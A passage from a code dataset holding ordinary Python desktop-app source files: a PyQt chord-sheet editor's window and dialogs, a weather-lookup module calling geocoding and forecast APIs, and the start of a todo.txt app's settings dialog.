curSecName)\n\n def blockSectionClickedAction(self, text):\n if text:\n self.updateBlocks(self.sectionDict[text])\n\n def blockSectionChangedAction(self, index):\n sName = self.window.blockSectionComboBox.currentText()\n if sName:\n self.currentSection = self.sectionDict[sName]\n self.window.blockTableView.populate(self.currentSection.blockList)\n else:\n self.currentSection = None\n\n def blockClickedAction(self, index):\n # set the controls to the values from the selected block\n bChord = 
self.window.blockTableView.model.item(index.row(), 0).text()\n self.window.blockChordComboBox.setCurrentText(\n bChord if bChord else \"None\")\n self.window.blockLengthLineEdit.setText(\n self.window.blockTableView.model.item(index.row(), 1).text())\n self.window.blockNotesLineEdit.setText(\n self.window.blockTableView.model.item(index.row(), 2).text())\n\n def getPath(self, value):\n \"\"\"\n Wrapper for Qt settings to return home directory if no setting exists.\n \"\"\"\n return str((settings.value(value) if settings.value(value) else os.path.expanduser(\"~\")))\n\n def setPath(self, value, fullpath):\n \"\"\"\n Wrapper for Qt settings to set path to open/save from next time from current file location.\n \"\"\"\n return settings.setValue(value, os.path.dirname(fullpath))\n\n def menuFileNewAction(self):\n if self.saveWarning(): # ask the user if they want to save \n self.doc = Document() #  new document object\n # copy this object as reference to check against on quitting\n self.lastDoc = copy(self.doc)\n #  reset file path (this document hasn't been saved yet)\n self.currentFilePath = None\n # new renderer\n self.renderer = Renderer(self.doc, self.style)\n self.UIInitDocument()\n self.updatePreview()\n\n def menuFileOpenAction(self):\n if self.saveWarning(): # ask the user if they want to save \n filePath = QFileDialog.getOpenFileName(self.window.tabWidget, 'Open file', self.getPath(\n \"workingPath\"), \"Chordsheet Markup Language files (*.xml *.cml);;Chordsheet Macro files (*.cma)\")[0]\n if filePath:\n self.openFile(filePath)\n\n def openFile(self, filePath):\n \"\"\"\n Opens a file from a file path and sets up the window accordingly.\n \"\"\"\n self.currentFilePath = filePath\n \n fileExt = os.path.splitext(self.currentFilePath)[1].lower()\n \n if fileExt == \".cma\":\n self.doc.loadCSMacro(self.currentFilePath)\n else: # if fileExt in [\".xml\", \".cml\"]:\n self.doc.loadXML(self.currentFilePath)\n \n self.lastDoc = copy(self.doc)\n self.setPath(\"workingPath\", self.currentFilePath)\n self.UIInitDocument()\n self.updatePreview()\n\n def menuFileSaveAction(self):\n self.updateDocument()\n\n fileExt = os.path.splitext(self.currentFilePath)[1].lower() if self.currentFilePath else \"\"\n\n if self.currentFilePath and fileExt != \".cma\":\n # Chordsheet Macro files can't be saved at this time\n self.saveFile(self.currentFilePath)\n else:\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', self.getPath(\n \"workingPath\"), \"Chordsheet ML files (*.xml *.cml)\")[0]\n if filePath:\n self.saveFile(filePath)\n\n def menuFileSaveAsAction(self):\n self.updateDocument()\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', self.getPath(\n \"workingPath\"), \"Chordsheet ML files (*.xml *.cml)\")[0]\n if filePath:\n self.saveFile(filePath)\n\n def saveFile(self, filePath):\n \"\"\"\n Saves a file to given file path and sets up environment.\n \"\"\"\n self.currentFilePath = filePath\n \n fileExt = os.path.splitext(self.currentFilePath)[1].lower()\n \n if fileExt == \".cma\":\n # At this stage we should never get here\n pass\n else: # if fileExt in [\".xml\", \".cml\"]:\n self.doc.saveXML(self.currentFilePath)\n \n self.lastDoc = copy(self.doc)\n self.setPath(\"workingPath\", self.currentFilePath)\n self.updateTitleBar() # as we may have a new filename\n\n def menuFileSavePDFAction(self):\n self.updateDocument()\n self.updatePreview()\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', self.getPath(\n \"lastExportPath\"), \"PDF files (*.pdf)\")[0]\n if 
filePath:\n self.renderer.savePDF(filePath)\n self.setPath(\"lastExportPath\", filePath)\n\n def menuFilePrintAction(self):\n if sys.platform == \"darwin\":\n pass\n # subprocess.call()\n else:\n pass\n\n @pyqtSlot()\n def menuFileCloseAction(self):\n self.saveWarning()\n\n def menuFileAboutAction(self):\n AboutDialog()\n\n def menuEditUndoAction(self):\n try:\n QApplication.focusWidget().undo() # see if the built in widget supports it\n except Exception:\n pass #  if not just fail silently\n\n def menuEditRedoAction(self):\n try:\n QApplication.focusWidget().redo()\n except Exception:\n pass\n\n def menuEditCutAction(self):\n try:\n QApplication.focusWidget().cut()\n except Exception:\n pass\n\n def menuEditCopyAction(self):\n try:\n QApplication.focusWidget().copy()\n except Exception:\n pass\n\n def menuEditPasteAction(self):\n try:\n QApplication.focusWidget().paste()\n except Exception:\n pass\n\n def saveWarning(self):\n \"\"\"\n Function to check if the document has unsaved data in it and offer to save it.\n \"\"\"\n self.updateDocument() # update the document to catch all changes\n\n if self.lastDoc == self.doc:\n return True\n else:\n wantToSave = UnsavedMessageBox().exec()\n\n if wantToSave == QMessageBox.Save:\n if not self.currentFilePath:\n filePath = QFileDialog.getSaveFileName(self.window.tabWidget, 'Save file', str(\n os.path.expanduser(\"~\")), \"Chordsheet ML files (*.xml *.cml)\")\n self.currentFilePath = filePath[0]\n self.doc.saveXML(self.currentFilePath)\n return True\n\n elif wantToSave == QMessageBox.Discard:\n return True\n \n else:\n return False\n\n def guitarVoicingAction(self):\n gdialog = GuitarDialog()\n\n voicing = gdialog.getVoicing()\n if voicing:\n self.window.guitarVoicingLineEdit.setText(voicing)\n\n def clearChordLineEdits(self):\n self.window.chordNameLineEdit.clear()\n self.window.guitarVoicingLineEdit.clear()\n self.window.pianoVoicingLineEdit.clear()\n # necessary on Mojave with PyInstaller (or previous contents will be shown)\n self.window.chordNameLineEdit.repaint()\n self.window.guitarVoicingLineEdit.repaint()\n self.window.pianoVoicingLineEdit.repaint()\n\n def clearSectionLineEdits(self):\n self.window.sectionNameLineEdit.clear()\n # necessary on Mojave with PyInstaller (or previous contents will be shown)\n self.window.sectionNameLineEdit.repaint()\n\n def clearBlockLineEdits(self):\n self.window.blockLengthLineEdit.clear()\n self.window.blockNotesLineEdit.clear()\n # necessary on Mojave with PyInstaller (or previous contents will be shown)\n self.window.blockLengthLineEdit.repaint()\n self.window.blockNotesLineEdit.repaint()\n\n def updateChordDict(self):\n \"\"\"\n Updates the dictionary used to generate the Chord menu (on the block tab)\n \"\"\"\n self.chordDict = {'None': None}\n self.chordDict.update({c.name: c for c in self.doc.chordList})\n self.window.blockChordComboBox.clear()\n self.window.blockChordComboBox.addItems(list(self.chordDict.keys()))\n\n def updateSectionDict(self):\n \"\"\"\n Updates the dictionary used to generate the Section menu (on the block tab)\n \"\"\"\n self.sectionDict = {s.name: s for s in self.doc.sectionList}\n self.window.blockSectionComboBox.clear()\n self.window.blockSectionComboBox.addItems(\n list(self.sectionDict.keys()))\n\n def removeChordAction(self):\n if self.window.chordTableView.selectionModel().hasSelection(): #  check for selection\n self.updateChords()\n\n row = self.window.chordTableView.selectionModel().currentIndex().row()\n oldName = self.window.chordTableView.model.item(row, 0).text()\n 
self.doc.chordList.pop(row)\n\n self.window.chordTableView.populate(self.doc.chordList)\n # remove the chord if any of the blocks have it attached\n for s in self.doc.sectionList:\n for b in s.blockList:\n if b.chord:\n if b.chord.name == oldName:\n b.chord = None\n self.window.blockTableView.populate(self.currentSection.blockList)\n self.clearChordLineEdits()\n self.updateChordDict()\n\n def addChordAction(self):\n success = False # initialise\n self.updateChords()\n\n cName = parseName(self.window.chordNameLineEdit.text())\n if cName:\n self.doc.chordList.append(Chord(cName))\n if self.window.guitarVoicingLineEdit.text() or self.window.pianoVoicingLineEdit.text():\n if self.window.guitarVoicingLineEdit.text():\n try:\n self.doc.chordList[-1].voicings['guitar'] = parseFingering(\n self.window.guitarVoicingLineEdit.text(), 'guitar')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n if self.window.pianoVoicingLineEdit.text():\n try:\n self.doc.chordList[-1].voicings['piano'] = parseFingering(\n self.window.pianoVoicingLineEdit.text(), 'piano')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n else:\n success = True #  chord successfully parsed\n else:\n ChordNameWarningMessageBox().exec() # Chord has no name, warn user\n\n if success == True: # if chord was parsed properly\n self.window.chordTableView.populate(self.doc.chordList)\n self.clearChordLineEdits()\n self.updateChordDict()\n\n def updateChordAction(self):\n success = False # see comments above\n if self.window.chordTableView.selectionModel().hasSelection(): #  check for selection\n self.updateChords()\n row = self.window.chordTableView.selectionModel().currentIndex().row()\n oldName = self.window.chordTableView.model.item(row, 0).text()\n cName = parseName(self.window.chordNameLineEdit.text())\n if cName:\n self.doc.chordList[row].name = cName\n if self.window.guitarVoicingLineEdit.text() or self.window.pianoVoicingLineEdit.text():\n if self.window.guitarVoicingLineEdit.text():\n try:\n self.doc.chordList[row].voicings['guitar'] = parseFingering(\n self.window.guitarVoicingLineEdit.text(), 'guitar')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n if self.window.pianoVoicingLineEdit.text():\n try:\n self.doc.chordList[row].voicings['piano'] = parseFingering(\n self.window.pianoVoicingLineEdit.text(), 'piano')\n success = True #  chord successfully parsed\n except Exception:\n VoicingWarningMessageBox().exec() # Voicing is malformed, warn user\n else:\n success = True #  chord successfully parsed\n else:\n ChordNameWarningMessageBox().exec()\n\n if success == True:\n self.updateChordDict()\n self.window.chordTableView.populate(self.doc.chordList)\n # update the names of chords in all blocklists in case they've already been used\n for s in self.doc.sectionList:\n for b in s.blockList:\n if b.chord:\n if b.chord.name == oldName:\n b.chord.name = cName\n if self.currentSection and self.currentSection.blockList:\n self.window.blockTableView.populate(self.currentSection.blockList)\n self.clearChordLineEdits()\n\n def removeSectionAction(self):\n if self.window.sectionTableView.selectionModel().hasSelection(): #  check for selection\n self.updateSections()\n\n row = self.window.sectionTableView.selectionModel().currentIndex().row()\n self.doc.sectionList.pop(row)\n\n 
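# refresh the section table, inputs and menus so the removal is visible everywhere\n 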
self.window.sectionTableView.populate(self.doc.sectionList)\n self.clearSectionLineEdits()\n self.updateSectionDict()\n\n def addSectionAction(self):\n self.updateSections()\n\n sName = self.window.sectionNameLineEdit.text()\n if sName and sName not in [s.name for s in self.doc.sectionList]:\n self.doc.sectionList.append(Section(name=sName))\n self.window.sectionTableView.populate(self.doc.sectionList)\n self.clearSectionLineEdits()\n self.updateSectionDict()\n else:\n # Section has no name or is not unique, warn user\n SectionNameWarningMessageBox().exec()\n\n def updateSectionAction(self):\n if self.window.sectionTableView.selectionModel().hasSelection(): #  check for selection\n self.updateSections()\n row = self.window.sectionTableView.selectionModel().currentIndex().row()\n\n sName = self.window.sectionNameLineEdit.text()\n if sName and sName not in [s.name for s in self.doc.sectionList]:\n self.doc.sectionList[row].name = sName\n self.window.sectionTableView.populate(self.doc.sectionList)\n self.clearSectionLineEdits()\n self.updateSectionDict()\n else:\n # Section has no name or is not unique, warn user\n SectionNameWarningMessageBox().exec()\n\n def removeBlockAction(self):\n if self.window.blockTableView.selectionModel().hasSelection(): #  check for selection\n self.updateBlocks(self.currentSection)\n\n row = self.window.blockTableView.selectionModel().currentIndex().row()\n self.currentSection.blockList.pop(row)\n\n self.window.blockTableView.populate(self.currentSection.blockList)\n\n def addBlockAction(self):\n self.updateBlocks(self.currentSection)\n\n try:\n #  can the value entered for block length be cast as a float\n bLength = float(self.window.blockLengthLineEdit.text())\n except Exception:\n bLength = False\n\n if bLength: # create the block\n self.currentSection.blockList.append(Block(bLength,\n chord=self.chordDict[self.window.blockChordComboBox.currentText(\n )],\n notes=(self.window.blockNotesLineEdit.text() or None)))\n self.window.blockTableView.populate(self.currentSection.blockList)\n self.clearBlockLineEdits()\n else:\n # show warning that length was not entered or in wrong format\n LengthWarningMessageBox().exec()\n\n def updateBlockAction(self):\n if self.window.blockTableView.selectionModel().hasSelection(): #  check for selection\n self.updateBlocks(self.currentSection)\n\n try:\n #  can the value entered for block length be cast as a float\n bLength = float(self.window.blockLengthLineEdit.text())\n except Exception:\n bLength = False\n\n row = self.window.blockTableView.selectionModel().currentIndex().row()\n if bLength:\n self.currentSection.blockList[row] = (Block(bLength,\n chord=self.chordDict[self.window.blockChordComboBox.currentText(\n )],\n notes=(self.window.blockNotesLineEdit.text() or None)))\n self.window.blockTableView.populate(\n self.currentSection.blockList)\n self.clearBlockLineEdits()\n else:\n LengthWarningMessageBox().exec()\n\n def generateAction(self):\n self.updateDocument()\n self.updatePreview()\n\n def updatePreview(self):\n \"\"\"\n Update the preview shown by rendering a new PDF and drawing it to the scroll area.\n \"\"\"\n try:\n self.currentPreview = self.renderer.stream()\n except Exception:\n QMessageBox.warning(self, \"Preview failed\", \"Could not update the preview.\",\n buttons=QMessageBox.Ok, defaultButton=QMessageBox.Ok)\n\n self.window.pdfArea.update(self.currentPreview)\n\n def updateTitleBar(self):\n \"\"\"\n Update the application's title bar to reflect the current document.\n \"\"\"\n if 
self.currentFilePath:\n self.setWindowTitle(_version.appName + \" – \" +\n os.path.basename(self.currentFilePath))\n else:\n self.setWindowTitle(_version.appName)\n\n def updateChords(self):\n \"\"\"\n Update the chord list by reading the table.\n \"\"\"\n chordTableList = []\n for i in range(self.window.chordTableView.model.rowCount()):\n chordTableList.append(\n Chord(parseName(self.window.chordTableView.model.item(i, 0).text()))),\n if self.window.chordTableView.model.item(i, 1).text():\n chordTableList[-1].voicings['guitar'] = parseFingering(\n self.window.chordTableView.model.item(i, 1).text(), 'guitar')\n if self.window.chordTableView.model.item(i, 2).text():\n chordTableList[-1].voicings['piano'] = parseFingering(\n self.window.chordTableView.model.item(i, 2).text(), 'piano')\n\n self.doc.chordList = chordTableList\n\n def matchSection(self, nameToMatch):\n \"\"\"\n Given the name of a section, this function checks if it is already present in the document. \n If it is, it's returned. If not, a new section with the given name is returned.\n \"\"\"\n section = None\n for s in self.doc.sectionList:\n if s.name == nameToMatch:\n section = s\n break\n if section is None:\n section = Section(name=nameToMatch)\n return section\n\n def updateSections(self):\n \"\"\"\n Update the section list by reading the table\n \"\"\"\n sectionTableList = []\n for i in range(self.window.sectionTableView.model.rowCount()):\n sectionTableList.append(self.matchSection(\n self.window.sectionTableView.model.item(i, 0).text()))\n\n self.doc.sectionList = sectionTableList\n\n def updateBlocks(self, section):\n \"\"\"\n Update the block list by reading the table.\n \"\"\"\n\n blockTableList = []\n for i in range(self.window.blockTableView.model.rowCount()):\n blockLength = float(\n self.window.blockTableView.model.item(i, 1).text())\n blockChord = self.chordDict[(self.window.blockTableView.model.item(\n i, 0).text() if self.window.blockTableView.model.item(i, 0).text() else \"None\")]\n blockNotes = self.window.blockTableView.model.item(i, 2).text(\n ) if self.window.blockTableView.model.item(i, 2).text() else None\n blockTableList.append(\n Block(blockLength, chord=blockChord, notes=blockNotes))\n\n section.blockList = blockTableList\n\n def updateDocument(self):\n \"\"\"\n Update the Document object by reading values from the UI.\n \"\"\"\n self.doc.title = self.window.titleLineEdit.text(\n ) # Title can be empty string but not None\n self.doc.subtitle = (self.window.subtitleLineEdit.text(\n ) if self.window.subtitleLineEdit.text() else None)\n self.doc.composer = (self.window.composerLineEdit.text(\n ) if self.window.composerLineEdit.text() else None)\n self.doc.arranger = (self.window.arrangerLineEdit.text(\n ) if self.window.arrangerLineEdit.text() else None)\n self.doc.tempo = (self.window.tempoLineEdit.text()\n if self.window.tempoLineEdit.text() else None)\n self.doc.timeSignature = int(self.window.timeSignatureSpinBox.value(\n )) if self.window.timeSignatureSpinBox.value() else self.doc.timeSignature\n\n self.style.pageSize = pageSizeDict[self.pageSizeSelected]\n self.style.unit = unitDict[self.unitSelected]\n self.style.leftMargin = float(self.window.leftMarginLineEdit.text(\n )) if self.window.leftMarginLineEdit.text() else self.style.leftMargin\n self.style.rightMargin = float(self.window.rightMarginLineEdit.text(\n )) if self.window.rightMarginLineEdit.text() else self.style.rightMargin\n self.style.topMargin = float(self.window.topMarginLineEdit.text(\n )) if self.window.topMarginLineEdit.text() 
else self.style.topMargin\n self.style.bottomMargin = float(self.window.bottomMarginLineEdit.text(\n )) if self.window.bottomMarginLineEdit.text() else self.style.bottomMargin\n self.style.lineSpacing = float(self.window.lineSpacingDoubleSpinBox.value(\n )) if self.window.lineSpacingDoubleSpinBox.value() else self.style.lineSpacing\n\n # make sure the unit width isn't too wide to draw!\n if self.window.beatWidthLineEdit.text():\n if (self.style.pageSize[0] - 2 * self.style.leftMargin * mm) >= (float(self.window.beatWidthLineEdit.text()) * 2 * self.doc.timeSignature * mm):\n self.style.unitWidth = float(\n self.window.beatWidthLineEdit.text())\n else:\n maxBeatWidth = (\n self.style.pageSize[0] - 2 * self.style.leftMargin * mm) / (2 * self.doc.timeSignature * mm)\n QMessageBox.warning(self, \"Out of range\", \"Beat width is out of range. It can be a maximum of {}.\".format(\n maxBeatWidth), buttons=QMessageBox.Ok, defaultButton=QMessageBox.Ok)\n\n # update chords, sections, blocks\n self.updateChords()\n self.updateSections()\n if self.currentSection:\n self.updateBlocks(self.currentSection)\n\n self.style.font = (\n 'FreeSans' if self.style.useIncludedFont else 'HelveticaNeue')\n # something for the font box here\n\n\nclass GuitarDialog(QDialog):\n \"\"\"\n Dialogue to allow the user to enter a guitar chord voicing. Not particularly advanced at present!\n May be extended in future.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.UIFileLoader(\n str(os.path.join(scriptDir, 'ui', 'guitardialog.ui')))\n\n def UIFileLoader(self, ui_file):\n ui_file = QFile(ui_file)\n ui_file.open(QFile.ReadOnly)\n\n self.dialog = uic.loadUi(ui_file)\n ui_file.close()\n\n def getVoicing(self):\n \"\"\"\n Show the dialogue and return the voicing that has been entered.\n \"\"\"\n if self.dialog.exec_() == QDialog.Accepted:\n result = [self.dialog.ELineEdit.text(),\n self.dialog.ALineEdit.text(),\n self.dialog.DLineEdit.text(),\n self.dialog.GLineEdit.text(),\n self.dialog.BLineEdit.text(),\n self.dialog.eLineEdit.text()]\n resultJoined = \",\".join(result)\n return resultJoined\n else:\n return None\n\n\nclass AboutDialog(QDialog):\n \"\"\"\n Dialogue showing information about the program.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.UIFileLoader(str(os.path.join(scriptDir, 'ui', 'aboutdialog.ui')))\n\n icon = QImage(str(os.path.join(scriptDir, 'ui', 'icon.png')))\n self.dialog.iconLabel.setPixmap(QPixmap.fromImage(icon).scaled(self.dialog.iconLabel.width(\n ), self.dialog.iconLabel.height(), Qt.KeepAspectRatio, transformMode=Qt.SmoothTransformation))\n\n self.dialog.versionLabel.setText(\"Version \" + _version.version)\n\n self.dialog.exec()\n\n def UIFileLoader(self, ui_file):\n ui_file = QFile(ui_file)\n ui_file.open(QFile.ReadOnly)\n\n self.dialog = uic.loadUi(ui_file)\n ui_file.close()\n\n\nclass UnsavedMessageBox(QMessageBox):\n \"\"\"\n Message box to alert the user of unsaved changes and allow them to choose how to act.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Question)\n self.setWindowTitle(\"Unsaved changes\")\n self.setText(\"The document has been modified.\")\n self.setInformativeText(\"Do you want to save your changes?\")\n self.setStandardButtons(\n QMessageBox.Save | QMessageBox.Discard | QMessageBox.Cancel)\n self.setDefaultButton(QMessageBox.Save)\n\n\nclass UnreadableMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that the chosen file cannot be opened.\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n 
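# plain warning dialog with a single OK button, shown when a file cannot be read\n 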
self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"File cannot be opened\")\n self.setText(\"The file you have selected cannot be opened.\")\n self.setInformativeText(\"Please make sure it is in the right format.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass ChordNameWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that a chord must have a name\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Unnamed chord\")\n self.setText(\"Chords must have a name.\")\n self.setInformativeText(\"Please give your chord a name and try again.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass SectionNameWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that a section must have a name\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Unnamed section\")\n self.setText(\"Sections must have a unique name.\")\n self.setInformativeText(\n \"Please give your section a unique name and try again.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass VoicingWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that the voicing entered could not be parsed\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Malformed voicing\")\n self.setText(\n \"The voicing you entered was not understood and has not been applied.\")\n self.setInformativeText(\n \"Please try re-entering it in the correct format.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nclass LengthWarningMessageBox(QMessageBox):\n \"\"\"\n Message box to warn the user that a block must have a length\n \"\"\"\n\n def __init__(self):\n super().__init__()\n\n self.setIcon(QMessageBox.Warning)\n self.setWindowTitle(\"Block without valid length\")\n self.setText(\"Blocks must have a whole number length.\")\n self.setInformativeText(\n \"Please enter a valid length for your block and try again.\")\n self.setStandardButtons(QMessageBox.Ok)\n self.setDefaultButton(QMessageBox.Ok)\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n\n d = Document()\n s = Style()\n\n # pass first argument as filename\n w = DocumentWindow(d, s, filename=(\n sys.argv[1] if len(sys.argv) > 1 else None))\n w.show()\n\n sys.exit(app.exec_())\n","repo_name":"ivanholmes/chordsheet","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":40397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39388000835","text":"import requests\nfrom requests.structures import CaseInsensitiveDict\nfrom CONF import COORDS_KEY, COORDS_KEY_WEATHER\nfrom utilities import rename_country\n\n\nclass API(object):\n \"\"\"\n management class for the API functionality of the app\n \"\"\"\n def __init__(self):\n self.loc_list = []\n self.max_temp = {}\n self.min_temp = {}\n self.humidity = {}\n self.status = {}\n self.location = \"\"\n self.op = -1\n\n def get_loc(self, location):\n \"\"\"\n get coords for the provided location\n :param location: a string describing the searched location\n :return:\n \"\"\"\n self.location = location\n\n # api url\n url = \"https://www.mapquestapi.com/geocoding/v1/\" \\\n \"address?key=%s\" % COORDS_KEY\n\n # setting up headers\n headers = 
CaseInsensitiveDict()\n headers[\"Content-Type\"] = \"application/json\"\n\n # setting up requested data for the program\n data = '{\"location\": \"%s\",\"options\": {\"thumbMaps\": true}}' % location\n\n # request\n try:\n resp = requests.post(url, headers=headers, data=data.encode('utf-8'))\n except requests.exceptions.ConnectionError:\n return False\n\n if resp.status_code != 200:\n return False\n\n resp_dict = resp.json()\n self._filter_relevant_locations(resp_dict[\"results\"][0][\"locations\"],\n location)\n\n return len(self.loc_list) != 0\n\n def _filter_relevant_locations(self, location_list, location):\n \"\"\"\n Isolate only the relevant results returned from the API\n :param location_list: the list of returned values\n :param location: the location received by the user\n :return: filtered list\n \"\"\"\n locations = [[loc[\"adminArea5\"], loc[\"adminArea1\"],\n loc[\"adminArea3\"], loc[\"adminArea4\"], loc[\"displayLatLng\"]]\n for loc in location_list]\n\n # Isolating the valid locations\n for loc in locations:\n for attr in loc[:-1]:\n if attr.lower() == location.lower():\n self.loc_list.append(loc)\n break\n elif rename_country(attr).lower() == location.lower():\n loc[1] = rename_country(location).title()\n self.loc_list.append(loc)\n break\n\n return self.loc_list\n\n def choose_city(self, index):\n \"\"\"\n Given the chosen location by the user, get the weather data\n :param index: the chosen location from self.loc_list\n :return: self after data added.\n \"\"\"\n self.op = index\n if len(self.loc_list) == 0:\n raise Exception(\"no valid location available\")\n\n lat = self.loc_list[index][4][\"lat\"]\n lon = self.loc_list[index][4][\"lng\"]\n url = \"https://api.openweathermap.org/data/2.5/\" \\\n \"onecall?lat=%s&lon=%s&appid=\" \\\n \"%s\" % (lat, lon, COORDS_KEY_WEATHER)\n\n try:\n resp = requests.post(url, timeout=3)\n except requests.exceptions.ConnectionError:\n return False\n\n if resp.status_code != 200:\n return resp.status_code\n\n data_dict = resp.json()\n self._process_weather_response(data_dict)\n\n return self\n\n def _process_weather_response(self, data_dict):\n self.max_temp = {day: round(data[\"temp\"][\"max\"] - 273.15, 2) for\n day, data in enumerate(data_dict[\"daily\"])}\n self.min_temp = {day: round(data[\"temp\"][\"min\"] - 273.15, 2) for\n day, data in enumerate(data_dict[\"daily\"])}\n self.humidity = {day: data[\"humidity\"] for\n day, data in enumerate(data_dict[\"daily\"])}\n self.status = {day: data[\"weather\"][0][\"main\"] for\n day, data in enumerate(data_dict[\"daily\"])}\n\n\nif __name__ == \"__main__\":\n api = API()\n","repo_name":"omriez/BestFW","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":3964,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"22789098024","text":"import sys\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\n\nfrom qtodotxt.ui.dialogs.settingsui import Ui_SettingsUI\n\n\nclass Settings(QtWidgets.QDialog):\n\n def __init__(self, maincontroller):\n QtWidgets.QDialog.__init__(self, maincontroller.view)\n self.maincontroller = maincontroller\n self.ui = Ui_SettingsUI()\n self.ui.setupUi(self)\n self.settings = QtCore.QSettings()\n self.setWindowFlags(\n QtCore.Qt.Dialog |\n QtCore.Qt.MSWindowsFixedSizeDialogHint |\n QtCore.Qt.WindowStaysOnBottomHint |\n QtCore.Qt.WindowSystemMenuHint |\n QtCore.Qt.WindowTitleHint |\n QtCore.Qt.WindowCloseButtonHint\n )\n\n self.load_settings()\n self.connect_all()\n\n def load_settings(self):\n self._int_settings_to_cb(\"auto_save\", 
self.ui.autoSaveCheckBox)\n self._int_settings_to_cb(\"singleton\", self.ui.singletonCheckBox, 0)\n self._int_settings_to_cb(\"auto_archive\", self.ui.autoArchiveCheckBox, 0)\n self._int_settings_to_cb(\"add_created_date\", self.ui.addCreatedDateCheckBox, 0)\n self._int_settings_to_cb(\"confirm_complete\", self.ui.confirmCompletionCheckBox)\n self._int_settings_to_cb(\"show_delete\", self.ui.deleteActionCheckBox, 1)\n priority = self.settings.value(\"lowest_priority\", \"D\")\n self.ui.lowestPriorityLineEdit.setText(priority)\n self._int_settings_to_cb(\"enable_tray\", self.ui.trayCheckBox, 0)\n self._int_settings_to_cb(\"hide_to_tray\", self.ui.hideToTrayCheckBox, 0)\n self._int_settings_to_cb(\"hide_on_startup\", self.ui.hideOnStartupCheckBox, 0)\n self._int_settings_to_cb(\"close_to_tray\", self.ui.closeToTrayCheckBox, 0)\n\n val = int(self.settings.value(\"enable_tray\", 0))\n self.ui.hideToTrayCheckBox.setEnabled(val)\n self.ui.hideOnStartupCheckBox.setEnabled(val)\n self.ui.closeToTrayCheckBox.setEnabled(val)\n\n val = self.settings.value(\"color_schem\", \"\")\n index = self.ui.colorSchemComboBox.findText(val, QtCore.Qt.MatchFixedString)\n if index >= 0:\n self.ui.colorSchemComboBox.setCurrentIndex(index)\n\n def _int_settings_to_cb(self, name, checkBox, default=1):\n val = int(self.settings.value(name, default))\n if val:\n checkBox.setCheckState(QtCore.Qt.Checked)\n else:\n checkBox.setCheckState(QtCore.Qt.Unchecked)\n\n def connect_all(self):\n self.ui.closeButton.clicked.connect(self.close)\n self.ui.singletonCheckBox.stateChanged.connect(self.setSingletonCheckBox)\n self.ui.autoSaveCheckBox.stateChanged.connect(self.setAutoSave)\n self.ui.autoArchiveCheckBox.stateChanged.connect(self.setAutoArchive)\n self.ui.addCreatedDateCheckBox.stateChanged.connect(self.setAddCreatedDate)\n self.ui.confirmCompletionCheckBox.stateChanged.connect(self.setConfirmCompletion)\n self.ui.deleteActionCheckBox.stateChanged.connect(self.setDeleteAction)\n self.ui.lowestPriorityLineEdit.textChanged.connect(self.setLowestPriority)\n self.ui.trayCheckBox.stateChanged.connect(self.enableTray)\n self.ui.hideToTrayCheckBox.stateChanged.connect(self.setHideToTray)\n self.ui.hideOnStartupCheckBox.stateChanged.connect(self.setHideOnStartup)\n self.ui.closeToTrayCheckBox.stateChanged.connect(self.setCloseToTray)\n self.ui.colorSchemComboBox.currentIndexChanged.connect(self.setColorSchemCombo)\n\n def _save_int_cb(self, name, val):\n if val == 0:\n self.settings.setValue(name, 0)\n else:\n self.settings.setValue(name, 1)\n\n def setSingletonCheckBox(self, val):\n self._save_int_cb(\"singleton\", val)\n\n def setAutoSave(self, val):\n self._save_int_cb(\"auto_save\", val)\n\n def setDeleteAction(self, val):\n self._save_int_cb(\"show_delete\", val)\n\n def setAutoArchive(self, val):\n self._save_int_cb(\"auto_archive\", val)\n\n def setAddCreatedDate(self, val):\n self._save_int_cb(\"add_created_date\", val)\n\n def setConfirmCompletion(self, val):\n self._save_int_cb(\"confirm_complete\", val)\n\n def setLowestPriority(self, text):\n self.settings.setValue(\"lowest_priority\", text)\n\n def enableTray(self, val):\n self._save_int_cb(\"enable_tray\", val)\n self.ui.hideToTrayCheckBox.setEnabled(val)\n self.ui.hideOnStartupCheckBox.setEnabled(val)\n self.ui.closeToTrayCheckBox.setEnabled(val)\n\n def setHideToTray(self, val):\n self._save_int_cb(\"hide_to_tray\", val)\n\n def setHideOnStartup(self, val):\n self._save_int_cb(\"hide_on_startup\", val)\n\n def setCloseToTray(self, val):\n 
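# persist the 'close to tray' checkbox state as an integer setting\n 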
